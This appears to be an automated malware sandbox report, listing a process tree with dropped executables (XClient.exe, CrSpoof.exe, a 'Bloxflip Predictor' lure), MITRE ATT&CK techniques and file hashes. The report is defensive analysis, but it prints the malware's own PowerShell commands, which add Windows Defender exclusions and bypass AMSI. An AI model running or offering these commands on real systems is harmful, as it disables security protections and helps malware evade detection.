    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:564
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff881ea3cb8,0x7ff881ea3cc8,0x7ff881ea3cd8
        6⤵
        
        PID:1500
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --no-sandbox --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1916 /prefetch:2
        6⤵
        Modifies registry class
        
        PID:4452
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2180 /prefetch:3
        6⤵
        
        PID:1880
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2524 /prefetch:8
        6⤵
        
        PID:412
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3068 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4304
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3932
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,7073584697581574422,8428535479286485488,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4656 /prefetch:8
        6⤵
        
        PID:5080
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3452
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4224
- - C:\Users\Admin\AppData\Local\Temp\Files\CrSpoof.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\CrSpoof.exe"
    3⤵
    - Adds Run key to start application
    PID:5068
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c "botnet.bat"
      4⤵
      PID:2252
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5092
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "& { Add-MpPreference -ExclusionPath \"$env:TEMP\"; Add-MpPreference -ExclusionPath \"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\" }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); $field.SetValue($null,$true);"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5048
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 0.1 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:3372
- - C:\Users\Admin\AppData\Local\Temp\Files\Bloxflip%20Predictor.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Bloxflip%20Predictor.exe"
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2144
- - C:\Users\Admin\AppData\Local\Temp\Files\VipToolMeta.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\VipToolMeta.exe"
    3⤵
    PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ff881ea3cb8,0x7ff881ea3cc8,0x7ff881ea3cd8
    3⤵
    PID:3496
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
    3⤵
    PID:3332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
    3⤵
    PID:4020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
    3⤵
    PID:2016
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
    3⤵
    PID:2032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
    3⤵
    PID:2480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
    3⤵
    PID:1620
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3572 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4884
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
    3⤵
    PID:748
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
    3⤵
    PID:560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
    3⤵
    PID:2184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,15102169780412947447,1024412198808805892,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5548 /prefetch:2
    3⤵
    PID:4808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3508

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3988

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4000

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2344

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:4976

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Suspicious use of UnmapMainImage
PID:4824

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4272

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2844

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:3100

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
917ba97c052dda31d8921cc09c20c9ec

SHA1
09c3b8c98350c5c811359415e2209260b816a31e

SHA256
81d04f3acaf7e9e6bbd49df41063d1595f202257460079d3e555998e0082626c

SHA512
ed1cde650f0088540c951b2d9ef8152144e88e3433b45f6295ee87150c26598d8be622d48f5925229a807479d4669d0d4151a1c46de17e389129d9311d20f0a5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
099bef511fde6884b79bd91d4cec5639

SHA1
25624518dd97de67b13779317804d5501a935eff

SHA256
abf4d30ec8f9ba16e0a4d76700f71dfabc65b7393e80c3496c4a2621f1b82b19

SHA512
b6327f84daba9326228631c8459d2127dc481ecd49c58540527251f3111bace203816a844bbbceb33c86ffdf8c3ab3ec407d1ab72dd14fc3cb8600958b350f23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77Security.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Filesize
1KB

MD5
b4e91d2e5f40d5e2586a86cf3bb4df24

SHA1
31920b3a41aa4400d4a0230a7622848789b38672

SHA256
5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

SHA512
968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sru.exe.log

Filesize
2KB

MD5
15eab799098760706ed95d314e75449d

SHA1
273fb07e40148d5c267ca53f958c5075d24c4444

SHA256
45030bd997f50bb52c481f7bc86fac5f375d08911bcc106b98d9d8f0c2ce9778

SHA512
50c125e2a98740db0a0122d7f4de97c50d84623e800b3d3e173049c8e28ff0fbe4add7677bc56cb2228f78ed17522f67ae8f1b85f62824012414ce38ce0b500c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e1544690d41d950f9c1358068301cfb5

SHA1
ae3ff81363fcbe33c419e49cabef61fb6837bffa

SHA256
53d69c9cc3c8aaf2c8b58ea6a2aa47c49c9ec11167dd9414cd9f4192f9978724

SHA512
1e4f1fe2877f4f947d33490e65898752488e48de34d61e197e4448127d6b1926888de80b62349d5a88b96140eed0a5b952ef4dd7ca318689f76e12630c9029da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d317cb06e84df81f67fba4a58f33708a

SHA1
efb2b49000cc3a01b902ab996f4947780902c388

SHA256
88f60dbe582576625e168a41afc1f40d752fc81a9fcc5d1cf5221a3a1d36918f

SHA512
81089d6f621c174da6f572a484b9903a0cb3ba25bd945474c72303bb777d851b91981ed1a6d10b9c1c9e811291d9c1b393f3150a75966a28098583bf029647d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9314124f4f0ad9f845a0d7906fd8dfd8

SHA1
0d4f67fb1a11453551514f230941bdd7ef95693c

SHA256
cbd58fa358e4b1851c3da2d279023c29eba66fb4d438c6e87e7ce5169ffb910e

SHA512
87b9060ca4942974bd8f95b8998df7b2702a3f4aba88c53b2e3423a532a75407070368f813a5bbc0251864b4eae47e015274a839999514386d23c8a526d05d85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\080cb176-99d7-4c1c-a89a-ec0af17c4895.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
00a455d9d155394bfb4b52258c97c5e5

SHA1
2761d0c955353e1982a588a3df78f2744cfaa9df

SHA256
45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed

SHA512
9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5a765c4ebd71d1f7fe5068ec92bb7595

SHA1
558488145b9ad0de3920e395c2d3549ae7bca264

SHA256
d9eb2d0c05fd168f28e563816105c5929fb73108645d64a0de8dbce4aef66a0c

SHA512
596cb76bd7583da1a9180ba2f39340fe22f7f6f06f4b5d854a5ce7208227215d9158d550fb9c532d6aeff53ebf224f73642031d6678178f847a7768399a53ff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cf39f5cb476ebf0a71ecb3b95a9f4405

SHA1
4542f8edf1fe9ba7794e457035bc870034c98bbf

SHA256
0e7b64070788d21aaeab987c5dc6215b805f564f34670ab0568afe70e8f0eacc

SHA512
7141e0af3c141ff7217b184ea7b7d44c086b947950f478f649e5153a1b6dea18f2029d951492c41672a87ef47f6948bde36f1e35635ec084c762a3381dedb88a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ad7b3e9c2598362f2394568af9d4ca58

SHA1
402db453caea2ad90dbe52d8da6a3feae6027b4c

SHA256
6202b65eddaac4823826de08579e874244faaa8573ef0cf87eb1ec47018658c1

SHA512
83ba833181ac33bf205a17745d181ebd24a1fd24e24dfa6f8c76effdeedf31e229827ba5d1cff504012f98cfd2f838decfd9bd67da8763c8c7325b586083e0a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8ba00850e9117a95d7630866ea3abf82

SHA1
bb7c641cf9cfa9903590b1e3a148f04e7314b54f

SHA256
959c67f24fa13eb929ce5e2c1b122120e31bba0247109c13cfb7a300cb032cde

SHA512
372b516f7be949fc73aad2f98aa5ecd7e51bd77364f397162a4a4b8d610105ab74bf64b34186f372534263101031918ee3339ce3cd439ca811a7eef5cef52d40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
